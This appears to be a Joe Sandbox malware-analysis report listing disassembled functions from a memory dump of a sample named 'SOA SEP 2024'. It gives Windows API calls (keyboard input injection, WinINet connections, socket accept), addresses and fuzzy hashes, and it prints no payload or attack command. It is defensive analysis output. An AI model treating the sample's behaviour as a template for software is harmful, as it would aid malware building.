String ID:
API String ID: 3321077145-0
Opcode ID: 97a924f9fd1241df695f2b470824ff571e76b33a767dadedf877c26677e825a9
Instruction ID: a4fe80bee898a6570a978bb89234cebad16f49d9a7942a2ce71667f23b7c9b30
Opcode Fuzzy Hash: 97a924f9fd1241df695f2b470824ff571e76b33a767dadedf877c26677e825a9
Instruction Fuzzy Hash: 04410739600610DFCF11AF15C488A4DBBE5BF99710B098498EE46AB3A2CB38FD01CB95

Function 007CB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007CB5D1

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 8f3fbd133d977ef60fa6cd18dbf63223c0a1cd8f1c2bf3c19811a8254413e340
Instruction ID: 94fd153397af6f22e926414df39b60b603f5cd7172c4a25530c13cbd3f3c18f5
Opcode Fuzzy Hash: 8f3fbd133d977ef60fa6cd18dbf63223c0a1cd8f1c2bf3c19811a8254413e340
Instruction Fuzzy Hash: CB31DC34601208FFEF308F18DC8AFAC7765AB0A350F64811DFA11E62E1C738E9608B56

Function 007CD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007CD807
GetWindowRect.USER32(?,?), ref: 007CD87D
PtInRect.USER32(?,?,007CED5A), ref: 007CD88D
MessageBeep.USER32(00000000), ref: 007CD8FE

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 3870b7edca37baca86e5965671204573d90188d06e65eb54a12bf5520802141d
Instruction ID: 7f63cc19c463a606e3d28af2200c733176210faa9dcb2159db8a0e00c7849028
Opcode Fuzzy Hash: 3870b7edca37baca86e5965671204573d90188d06e65eb54a12bf5520802141d
Instruction Fuzzy Hash: 8E415674A00219DFCB21DF58D888FA9BBF5BB99310F2881BDE8159B260D738ED45CB40

Function 007A3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 007A3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 007A3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 007A3B34
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 007A3B92

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 96949939b33e1bbf8944490e28fc39ea26ac2f94575c75fd4405ab99bcd3c46e
Instruction ID: 029f45b5292043b812b4af756a4b0abd2c227fb43e13b569f8d59acb97963efa
Opcode Fuzzy Hash: 96949939b33e1bbf8944490e28fc39ea26ac2f94575c75fd4405ab99bcd3c46e
Instruction Fuzzy Hash: 6331F4B0A04298AEEB348F648819BBE7BA69BD7310F04035AF481961D2C77D8F85D775

Function 00794004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00794038
__isleadbyte_l.LIBCMT ref: 00794066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00794094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007940CA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 4bd02eca16e1b37ff34ef86c48640f6158356a5ecfdb0fe368f280f586ccba0f
Instruction ID: ded257e16f334b4f37fca86f87dbe4cf1ca0c7abf301e294b0356408c6b10856
Opcode Fuzzy Hash: 4bd02eca16e1b37ff34ef86c48640f6158356a5ecfdb0fe368f280f586ccba0f
Instruction Fuzzy Hash: AD31D23160020AEFDF219F38D848FAA7BA5BF41310F1580A8E6658B0A0E739DC92D790

Function 007C7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007C7CB9

Part of subcall function 007A5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 007A5F6F
Part of subcall function 007A5F55: GetCurrentThreadId.KERNEL32 ref: 007A5F76
Part of subcall function 007A5F55: AttachThreadInput.USER32(00000000,?,007A781F), ref: 007A5F7D

GetCaretPos.USER32(?), ref: 007C7CCA
ClientToScreen.USER32(00000000,?), ref: 007C7D03
GetForegroundWindow.USER32 ref: 007C7D09

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 9ab71c459d2dc12524d4f6a3f0bae8d0b8d5fdce2817c6c3d3fb85af3c192818
Instruction ID: 3bf03ecc06c55f2c968fdb7688116ded70b2ea7eeaf9937c2c97cde21455f58f
Opcode Fuzzy Hash: 9ab71c459d2dc12524d4f6a3f0bae8d0b8d5fdce2817c6c3d3fb85af3c192818
Instruction Fuzzy Hash: 8F312172900108AFDB11EFA5DC859EFBBFDEF59310B10846AE819E7211DA359E05CFA0

Function 007CF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

GetCursorPos.USER32(?), ref: 007CF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007DE4C0,?,?,?,?,?), ref: 007CF226
GetCursorPos.USER32(?), ref: 007CF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007DE4C0,?,?,?), ref: 007CF2A6

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 4d39be1d8c921f7b8fa656afba33a2e064330a4047c6a634be99eb8e61f51f0f
Instruction ID: f06dfa96ce1785765d6cbbfa5dbbbd8c73c87944aee63e03cf79cb114ab5bdc1
Opcode Fuzzy Hash: 4d39be1d8c921f7b8fa656afba33a2e064330a4047c6a634be99eb8e61f51f0f
Instruction Fuzzy Hash: 2A216D39501018EFCB258F94D898EFE7BB6FB09720F14806DF9058B2A1D3389E51DB50

Function 007B431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B4358

Part of subcall function 007B43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B4401
Part of subcall function 007B43E2: InternetCloseHandle.WININET(00000000), ref: 007B449E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 9311839f512cc18a10a2ca9a23ab543a9e6a78cca4e52698c1f329ff7dae0eae
Instruction ID: 0a7e3bb4708408ad5b530cfa5085cdd99d3e5c00f9206f899905c38d17c22b55
Opcode Fuzzy Hash: 9311839f512cc18a10a2ca9a23ab543a9e6a78cca4e52698c1f329ff7dae0eae
Instruction Fuzzy Hash: CB219F35201705BBEB219F609C40FFBB7E9FF48710F18401ABA15AB652DB79D82197A4

Function 007B8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 007B8AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 007B8AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 007B8AFF
WSAGetLastError.WSOCK32(00000000), ref: 007B8B16

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 83b3053f1579c807e2d567b0e3f7ddb9746df677618fa26c16dd31f6158c9f86
Instruction ID: 3661a262dd2d0300be36bae7a6f9f57ceb007e7afaf37a22b1d625e2d72c9414
Opcode Fuzzy Hash: 83b3053f1579c807e2d567b0e3f7ddb9746df677618fa26c16dd31f6158c9f86
Instruction Fuzzy Hash: 29219672A001249FC7219F68C885ADE7BECEF5A350F008169F849DB251DB78DD41CF90

Function 007C8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 007C8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007C8ADC

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 2b49e1def7d873444bb1920bc009496a7022d95421d732194eef17b718f7bb31
Instruction ID: 2b233cc7e434666a43e560e35c48fd09e4b0d14566f3b80d4defdb2d2e9aded8
Opcode Fuzzy Hash: 2b49e1def7d873444bb1920bc009496a7022d95421d732194eef17b718f7bb31
Instruction Fuzzy Hash: 3E11BE31305510AFDB55AB18CC49FBE7799BF8A320F14811EF816CB2E2CB78AC118795

Function 007A0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007A1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007A0ABB,?,?,?,007A187A,00000000,000000EF,00000119,?,?), ref: 007A1E77
Part of subcall function 007A1E68: lstrcpyW.KERNEL32(00000000,?,?,007A0ABB,?,?,?,007A187A,00000000,000000EF,00000119,?,?,00000000), ref: 007A1E9D
Part of subcall function 007A1E68: lstrcmpiW.KERNEL32(00000000,?,007A0ABB,?,?,?,007A187A,00000000,000000EF,00000119,?,?), ref: 007A1ECE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,007A187A,00000000,000000EF,00000119,?,?,00000000), ref: 007A0AD4
lstrcpyW.KERNEL32(00000000,?,?,007A187A,00000000,000000EF,00000119,?,?,00000000), ref: 007A0AFA
lstrcmpiW.KERNEL32(00000002,cdecl,?,007A187A,00000000,000000EF,00000119,?,?,00000000), ref: 007A0B2E

Strings

cdecl, xrefs: 007A0B25

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 538b5eddce9e5f50467d320b92531e9559b1568fc5a281d20e7296fb75bd585c
Instruction ID: 1a718b7f484df8db1e86b55040e86b383a625fdcb03eee8cb00f36256ca48413
Opcode Fuzzy Hash: 538b5eddce9e5f50467d320b92531e9559b1568fc5a281d20e7296fb75bd585c
Instruction Fuzzy Hash: CE11B176200345EFDB25AF24DC45E7A77A9FF8A350F80862AE806CB250EB759850C7E1

Function 00792F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00792FB5

Part of subcall function 0078395C: __FF_MSGBANNER.LIBCMT ref: 00783973
Part of subcall function 0078395C: __NMSG_WRITE.LIBCMT ref: 0078397A
Part of subcall function 0078395C: RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000001,00000000,?,?,0077F507,?,0000000E), ref: 0078399F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 669c5730addc00b2500b1d357e0b875620bd7ee8d8c13668a42cd7bb74576a21
Instruction ID: d0df2222bd52a29f18ff3e3d46c96a28ceb1ac1d909aa206dc0e93fc48faa1af
Opcode Fuzzy Hash: 669c5730addc00b2500b1d357e0b875620bd7ee8d8c13668a42cd7bb74576a21
Instruction Fuzzy Hash: 3611CA31549211EBDF353F74BC496693BA9AF04360F208925F84A9A162DB3CCD41DBA0

Function 007A058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007A05AC
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007A05C7
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007A05DD
FreeLibrary.KERNEL32(?), ref: 007A0632

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 7610efeabbada37e14bb38f03052b162b799256c7a9d9288c4a7946b09963d6c
Instruction ID: 1836ec5ca35407ea80a14d7dcc68efe4b18f0d4205b791a29579961169fc5af9
Opcode Fuzzy Hash: 7610efeabbada37e14bb38f03052b162b799256c7a9d9288c4a7946b09963d6c
Instruction Fuzzy Hash: 3321D071900208EFDB20CFA0DD88ADABBB8EF85308F008A6DE51696050D779EA54DF91

Function 007A6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007A6733
_memset.LIBCMT ref: 007A6754
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007A67A6
CloseHandle.KERNEL32(00000000), ref: 007A67AF

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: a0a9063cdca7e14e060b95365b2474d8fda43ea1188c054390dc6c090c382e65
Instruction ID: ca7c222047a0b8a56f0d6314a7f0d0bd0dc1d8ae74c0ca3eb2cbfca59f0e1e7c
Opcode Fuzzy Hash: a0a9063cdca7e14e060b95365b2474d8fda43ea1188c054390dc6c090c382e65
Instruction Fuzzy Hash: 4C11CA75901228BAE73057A5AC4DFABBABCEF45764F10429AF504E71D0D6744E808BB8

Function 0079B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0079AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0079AA79
Part of subcall function 0079AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0079AA83
Part of subcall function 0079AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0079AA92
Part of subcall function 0079AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0079AA99
Part of subcall function 0079AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079AAAF

GetLengthSid.ADVAPI32(?,00000000,0079ADE4,?,?), ref: 0079B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0079B227
HeapAlloc.KERNEL32(00000000), ref: 0079B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0079B247

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: e5eb81fbf95712f6ded0b987cfcf352c3eb40d123305ec8ef23bc90c12fadc16
Instruction ID: a808db170c43fa95ab9a34e9ae2e32f6b0feb25c9eba96bef73a2858c2c5ae5a
Opcode Fuzzy Hash: e5eb81fbf95712f6ded0b987cfcf352c3eb40d123305ec8ef23bc90c12fadc16
Instruction Fuzzy Hash: 0C118C71A01205FFDF149F98ED85AAEB7A9FF89314B24802DE9429B210D779AE44CB50

Function 0079B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 0079B498
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079B4AA
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079B4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0079B4DB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b6c65891e755026f328a9d06dce404224e4feed6ef7c78bc64e8670213dae97d
Instruction ID: ae7d1cae38b467b3b3b9f0ca4ad38481634c0a5964568fa65091a2b6f629d6a9
Opcode Fuzzy Hash: b6c65891e755026f328a9d06dce404224e4feed6ef7c78bc64e8670213dae97d
Instruction Fuzzy Hash: CC115A7A900218FFDF11DFA8D985E9DBBB4FB08700F204091E604B7290D771AE10EB94

Function 0077B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0077B5A5
GetClientRect.USER32(?,?), ref: 007DE69A
GetCursorPos.USER32(?), ref: 007DE6A4
ScreenToClient.USER32(?,?), ref: 007DE6AF

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 31bae0397a1e05ad145096e746d55dde9ecdd225555cb65f638c16a7cb22411c
Instruction ID: e1322276b2e99811fbb2dd62f6b5801a6184321349f453e1a756aa0687abfc8d
Opcode Fuzzy Hash: 31bae0397a1e05ad145096e746d55dde9ecdd225555cb65f638c16a7cb22411c
Instruction Fuzzy Hash: 8A113A31501029FFCF10EFA4DC899BE77B8EB08344F108455F905EB140D338AA95CBA5

Function 007A732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007A7352
MessageBoxW.USER32(?,?,?,?), ref: 007A7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007A739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007A73A2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
